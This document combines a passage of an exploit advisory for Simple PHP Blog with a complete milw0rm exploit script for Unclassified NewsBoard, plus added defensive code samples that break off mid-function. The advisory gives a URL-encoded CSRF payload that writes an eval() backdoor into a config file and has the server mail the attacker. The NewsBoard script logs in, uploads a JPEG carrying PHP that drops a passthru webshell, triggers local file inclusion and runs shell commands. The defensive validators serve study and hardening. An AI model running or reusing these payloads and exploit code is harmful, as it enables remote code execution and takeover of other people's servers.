  56|   if (@move_uploaded_file($_FILES['user_emot']['tmp_name'], $uploadfile)){
  57|     chmod( $uploadfile, 0777 );
  58|     $ok = true;
  59|   }

  As you can see, there is only one protection against file
  upload vulnerabilities: the function getimagesize() returns
  FALSE if the uploaded file isn't a valid image file.
  But this can be bypassed easily. Take a look at this:

  C:\>edjpgcom img1x1.jpg

  C:\>hexdump img1x1.jpg


  C:\>ren img1x1.jpg backdoor.php

  The created file is a valid JPEG image, so the check made
  by the getimagesize() function is bypassed, and so
  the backdoor is uploaded to "images/emoticons".
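  A stricter upload validator, added here as an example and not part of sphpblog: it keeps getimagesize() but names the stored file from the detected image type rather than the client's filename, and refuses any image that carries a PHP open tag in its bytes. validateEmoticonUpload() and ALLOWED_IMAGE_EXT are names of my own choosing.

```php
<?php
// Added example, not sphpblog code: validate an emoticon upload. It keeps
// the getimagesize() check and adds what the advisory shows is missing:
// the stored name comes from the detected image type, never from the
// client's filename, and a file carrying a PHP open tag is refused even
// when it is, byte for byte, a valid image.

const ALLOWED_IMAGE_EXT = [
    IMAGETYPE_GIF  => 'gif',
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
];

function validateEmoticonUpload(string $tmpPath, int $maxBytes = 65536): array
{
    if (!is_file($tmpPath) || filesize($tmpPath) > $maxBytes) {
        return ['ok' => false, 'reason' => 'missing or too large'];
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || !isset(ALLOWED_IMAGE_EXT[$info[2]])) {
        return ['ok' => false, 'reason' => 'not a supported image'];
    }
    // A JPEG comment segment (FF FE) or trailing data after a GIF trailer can
    // hold arbitrary bytes, so "valid image" says nothing about what a PHP
    // handler would do with the file. Refuse any open tag anywhere in it;
    // a rare false positive on a real image is a cheap price.
    $bytes = file_get_contents($tmpPath);
    if (preg_match('/<\?(php\b|=|\s)/i', $bytes)) {
        return ['ok' => false, 'reason' => 'image contains a PHP open tag'];
    }
    // Server-chosen name: random, with the extension of the detected type.
    $name = bin2hex(random_bytes(8)) . '.' . ALLOWED_IMAGE_EXT[$info[2]];
    return ['ok' => true, 'name' => $name, 'width' => $info[0], 'height' => $info[1]];
}

// Constructed fixtures: a genuine 1x1 GIF, and the same GIF with a PHP tag
// appended after the trailer (getimagesize() still reports a valid image).
$gif   = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$clean = tempnam(sys_get_temp_dir(), 'emo');
$poly  = tempnam(sys_get_temp_dir(), 'emo');
file_put_contents($clean, $gif);
file_put_contents($poly, $gif . "<?php echo 'marker'; ?>");

$a = validateEmoticonUpload($clean);
$b = validateEmoticonUpload($poly);
unlink($clean);
unlink($poly);

if (!$a['ok'] || $b['ok']) {
    throw new RuntimeException('validator did not behave as expected');
}
printf("clean upload stored as %s (%dx%d)\n", $a['name'], $a['width'], $a['height']);
printf("polyglot refused: %s\n", $b['reason']);
```

  Even with this check, the emoticon directory should be served with PHP execution disabled (for Apache, e.g. `php_flag engine off` in a .htaccess placed there), so that a file which slips through is only ever delivered as data.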



  VIII - CODE EXECUTION (+CSRF)

  There is a CSRF vulnerability which can lead to the execution
  of PHP code; this is the critical point of this script.
  Let's look at the code of the file "manage_users.php":

   61| if ( $_GET[ 'action' ] == "update" ) {
     |
   63|  if ($_SESSION[ 'fulladmin' ] != 'yes' ) {
   64|         echo($lang_string['fulladminerror']);
   65| } else {
   66| 
   67|   // First read and remove the offending line
   68|   $pfile = fopen("config/users.php","a+");
   69|   rewind($pfile);
     |
   70|   while (!feof($pfile)) {
   71|     $line = fgets($pfile);
   72|     $tmp = explode('|', $line);
   73| 
   74|     if ( $_GET[ 'type' ] == "edit" ) {
   75|       if ( $tmp[1] != $_GET[ 'user' ] )
     |          { $newfile = $newfile . $line; }
   76|     } else {
   77|       $newfile = $newfile . $line;
   78|     }
   79|   }
   80|   fclose($pfile);
     |
  101|   $blankfield = "";
  102| 
  103|   // Create the record structure
  104|   if ( $_GET[ 'type' ] == "edit" ) {
     |
  107|     $password = $_GET[ 'oldpasshash' ];
  108|     if ( $password != $_POST[ 'sPassword' ] ) {
  109|       $password = crypt($_GET[ 'user' ],$_POST[ 'sPassword' ] );
  110|     }
  111| 
  112|     $array =
     |     array($_POST[ 'sFullname' ], $_GET[ 'user' ], $password,
     |     $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
     |     $modcomments, $deleteentries, $editany, $blankfield);
     |
  113|   } else {
     |
  114|     $array =
     |     array($_POST[ 'sFullname' ], $_POST[ 'sUsername' ],
     |     crypt( $_POST[ 'sUsername' ], $_POST[ 'sPassword' ] ),
     |     $_POST[ 'sAvatar' ], $active, $_POST[ 'sEmail' ],
     |     $modcomments, $deleteentries, $editany, $blankfield);
  115|   }
     |
  116|   $str = implode('|', $array);
  117|   $newfile = $newfile . $str . "\n";
     |
  120|   $pfile = fopen("config/users.php","w");
  121|   fwrite($pfile, $newfile);
  122|   fclose($pfile);
  123| 
  124|   redirect_to_url("manage_users.php");
  125| }
  126| }

  As you can see, there is no protection against PHP characters
  (like strip_tags()) before inserting the user's data into
  the PHP file. But the author of the script added a ".htaccess"
  file in the "config" directory. Let's see the content of
  this file:

   1| IndexIgnore *
   2| 
   3| <Files .htaccess>
   4| order allow,deny
   5| deny from all
   6| </Files>
   7| 
   8| <Files *.txt>
   9| order allow,deny
  10| deny from all
  11| </Files>

  So we can't list the content of the directory, and we
  don't have access to .htaccess/.txt files. But we can
  access .php files! This requires admin rights...
  but we can write PHP code with the GET method, which is
  why there's also a CSRF vulnerability. In our example
  we will use this PHP code (as you can see, we don't
  need magic_quotes_gpc=Off):

   1| <?php
   2| 
   3| if(isset($_GET[mail]))
   4| {
   5| $mail = <<<MAIL
   6| hacker@you.com
   7| MAIL;
   8| 
   9| $subject = <<<SUBJ
  10| Hey !
  11| SUBJ;
  12| 
  13| $body = <<<BODY
  14| Code executed
  15| BODY;
  16| 
  17| mail($mail,$subject,$body);
  18| }
  19| else eval($_SERVER[HTTP_SHELL]);
  20| 
  21| ?>

  So the attacker just has to post (using the XSS)
  something like this:

  <img src=http://<site>/manage_users.php?action=update
  &type=edit&user=%3C%3Fphp%0D%0A%0D%0Aif%28isset%28%24
  _GET%5Bmail%5D%29%29%0D%0A%7B%0D%0A%24mail+%3D+%3C%3C
  %3CMAIL%0D%0Ahacker%40you.com%0D%0AMAIL%3B%0D%0A%0D%0
  A%24subject+%3D+%3C%3C%3CSUBJ%0D%0AHey+%21%0D%0ASUBJ%
  3B%0D%0A%0D%0A%24body+%3D+%3C%3C%3CBODY%0D%0ACode+exe
  cuted%0D%0ABODY%3B%0D%0A%0D%0Amail%28%24mail%2C%24sub
  ject%2C%24body%29%3B%0D%0A%7D%0D%0Aelse+eval%28%24_SE
  RVER%5BHTTP_SHELL%5D%29%3B%0D%0A%0D%0A%3F%3E>
  <!--- Write php code --->

  <img src=http://<site>/config/users.php?mail=1>
  <!--- mail the attacker --->

  <img src=http://<site>/trackback_delete_cgi.php?track
  back=MY_COMMENT_FILENAME>
  <!--- delete the comment --->

  Afterwards, he has to wait until the admin sees his comment.
  Then the HTTP request will be sent to the script, and
  so the PHP code will be written into "config/users.php".
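  What defeats every forged request in sections V, VI and VIII is the same pair of server-side checks, shown here as an added example (not sphpblog code): state-changing actions must be POST and must carry a per-session CSRF token. issueCsrfToken() and refuseUnlessSameOrigin() are names of my own choosing; in the blog, the $session array would be $_SESSION.

```php
<?php
// Added example, not sphpblog code: the two server-side checks that defeat
// the forged <img src=...> requests in sections V, VI and VIII. A state-
// changing admin action must (1) arrive as POST and (2) carry a per-session
// CSRF token, which a tag planted in a comment can neither know nor send.

// Issue (or reuse) the session's token; in the blog, $session is $_SESSION.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns null when the request may proceed, otherwise the reason to refuse.
function refuseUnlessSameOrigin(array $server, array $post, array $session): ?string
{
    $method = $server['REQUEST_METHOD'] ?? 'GET';
    if ($method !== 'POST') {
        return "state-changing action requested with $method";
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    // hash_equals(): constant-time comparison; it requires two strings.
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return 'missing or wrong CSRF token';
    }
    // Defence in depth: modern browsers send Sec-Fetch-Site; when present,
    // refuse cross-site submissions even if a token were ever leaked.
    $site = $server['HTTP_SEC_FETCH_SITE'] ?? null;
    if ($site !== null && !in_array($site, ['same-origin', 'none'], true)) {
        return "cross-site request ($site)";
    }
    return null;
}

// Constructed requests against one logged-in admin session.
$session = [];
$token = issueCsrfToken($session);

$cases = [
    // The advisory's vector: an <img> fetch is always a GET with no body.
    'forged GET'      => [['REQUEST_METHOD' => 'GET'], [], $session],
    // A forged auto-submitted form: POST, but the token is not known.
    'forged POST'     => [['REQUEST_METHOD' => 'POST', 'HTTP_SEC_FETCH_SITE' => 'cross-site'],
                          ['csrf_token' => 'guess'], $session],
    // The real manage_users form, which embeds the token as a hidden field.
    'legitimate POST' => [['REQUEST_METHOD' => 'POST', 'HTTP_SEC_FETCH_SITE' => 'same-origin'],
                          ['csrf_token' => $token], $session],
];

foreach ($cases as $label => [$server, $post, $sess]) {
    $reason = refuseUnlessSameOrigin($server, $post, $sess);
    printf("%-15s -> %s\n", $label, $reason ?? 'allowed');
}
```

  The token stops the forged request from reaching the file-writing code; the record written to config/users.php still needs the field validation the advisory notes is missing.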



  IX - END

  As you can see, there are some pretty cool things here:

  - [III] We bypass the NoScript Firefox plugin protection.
    We don't use any <script> tags.

  - [V] We use a "self inclusion" technique.
    We use HTML and PHP comment tags, which are very
    useful in our case.

  I didn't contact the author of the script, but if
  he keeps himself informed of updates concerning his
  script, he should correct these vulnerabilities as
  quickly as possible.


  //Greetz: ddx39, berga, wo, overlock[]




Simple PHP Blog versions 0.5.1 and below suffer from multiple vulnerabilities including cross site scripting, local file inclusion, and code execution flaws.

rgod/Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit ( php)

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n";
echo "local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";

/*
1.5.3 patch level 4 and below, exploit is a bit different, ex:
 
http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00
*/

if ($argc<6) {
echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to UNB\r\n";
echo "cmd:       a shell command\r\n";
echo "user/pass: you need a valid user account to upload files\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
die;
}

/* software site: http://newsboard.unclassified.de/

   description: "The Unclassified NewsBoard (short UNB) is an open-source,
   PHP-based internet bulletin board system"

   vulnerable code in unb_lib/abbc.conf.php at lines 635-641:

   ...
   // Smiley Definitions
  if ($ABBC['Config']['smileset'])
  {
	$ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
	$ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
	@include($ABBC['Config']['smilepath'] . 'config.php');
  }
  ...

  The $ABBC['Config']['smileset'] variable is not initialized before being used
  to include files. You cannot access this code directly, but in unb_lib/abbc.css.php
  at line 16 we have:

  ...
  require('abbc.conf.php');
  ...

  this script is not protected by the unb_lib folder .htaccess file:

  # Don't allow direct PHP requests in this directory
  <Files *.inc.php>
	Order allow,deny
	Deny from all
  </Files>
  <Files *.lib.php>
	Order allow,deny
	Deny from all
  </Files>

  so, if register_globals = On & magic_quotes_gpc = Off, you can include files
  from local resources, poc:

  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la

  this script tries to include an avatar or photo with malicious php code
  inside; you need a valid account to upload files

									      */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;

}

$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$pass=$argv[4];
$cmd="";$port=80;$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "step 0 -> check if suntzu.php is already installed...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"56789"))
{
  echo "Exploit succeeded...";
  $temp=explode("56789",$html);
  die("\r\n".$temp[1]."\r\n");
}

echo "step 1 -> login...\r\n";
$data ="LoginName=".urlencode(trim($username));
$data.="&LoginPassword=".urlencode(trim($pass));
$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$cookie=$temp2[0];
$temp2=explode(' ',$temp[2]);
$cookie.=" ".$temp2[0];
echo 'Your cookie: '.$cookie."\r\n";
$temp=explode("=",$cookie);
$temp2=explode("+",$temp[2]);
$id=$temp2[0];
echo "User Id -> ".$id."\r\n";

echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
$shell=
chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);

/*
this image carries the following PHP code in a JPEG comment segment (COM,
marker 0xFFFE, the 0xff 0xfe 0x01 0x07 right after the SOI above), not in
EXIF: image decoders skip the segment, but include() executes the
<?php ... ?> block it contains.
Note: chmod("suntzu.php",777) passes decimal 777 (octal 1411), not 0777;
the dropped file stays readable by its owner, the web server user, so the
shell still works. get_magic_quotes_gpc() was removed in PHP 8, and the
inclusion itself needs register_globals = On, which PHP 5.4 removed.
<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
fclose($fp);
chmod("suntzu.php",777);
?>
*/

$data='-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="action"

edit
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="id"

'.$id.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="cat"

postoptions
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Signature"


-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatar"

1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg"
Content-Type: image/pjpeg

'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="avatarurl"


-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg"
Content-Type: image/pjpeg

'.$shell.'
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photourl"


-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="photo"

1
-----------------------------7d614f2d12043e
Content-Disposition: form-data; name="Save"

Save
-----------------------------7d614f2d12043e--
';

$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: ".$cookie."\r\n\r\n";
$packet.=$data;
#debug
#echo quick_dump($packet);
sendpacketii($packet);

echo "step 3 -> try to include avatar or photo...\r\n";
$xpl=array(
	   urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)),
	   urlencode("../../upload/photo_".$id.".jpeg".chr(0x00))
	  );

for ($i=0; $i<=count($xpl)-1; $i++)
{
  $packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies
  $packet.="Connection: Close\r\n\r\n";
  #debug
  #echo quick_dump($packet);
  sendpacketii($packet);
}

echo "step 4 -> Launch commands...\r\n";
$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"56789"))
{
  echo "Exploit succeeded...";
  $temp=explode("56789",$html);
  die("\r\n".$temp[1]."\r\n");
}
//if you are here...
echo "Exploit failed...";
?>

# milw0rm.com [2006-05-11]
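The two ingredients of the chain above, the image that is also a PHP script and the unchecked ABBC[Config][smileset] value, shown as an added Python example. This is not rgod's code and not UNB code: the JPEG segment walker, the COM-segment builder, the 16-byte JFIF APP0 it appends, the PHP-tag pattern and the allowlist check are this example's own, and the sample inputs are constructed.

```python
"""Added example (not part of the exploit above): build the JPEG/PHP polyglot
the script uploads, find PHP hidden in JPEG metadata, and apply the allowlist
that the vulnerable smileset include lacks."""
import re
import struct

SOI, EOI, COM, APP0, SOS = 0xD8, 0xD9, 0xFE, 0xE0, 0xDA


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for every length-prefixed segment before SOS.

    A segment is FF <marker> <16-bit big-endian length, counting itself> <payload>.
    Lengths are bounds-checked so a truncated or lying header cannot read past
    the buffer. (0xFF fill bytes and stand-alone markers are not expected here.)
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI:
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == SOS:  # entropy-coded image data follows; stop walking
            return
        pos += 2 + length


def build_php_jpeg(php: bytes) -> bytes:
    """Wrap PHP source in a COM (0xFFFE) segment, as the exploit's image does.

    Decoders skip COM, but PHP's include() scans the whole file for <?php ... ?>
    and runs it, so one file is both an image and a script. Only the container
    is built (no DQT/SOF/DHT/SOS), so it carries no pixels; an upload check that
    decodes the image would need those segments too.
    """
    if len(php) + 2 > 0xFFFF:
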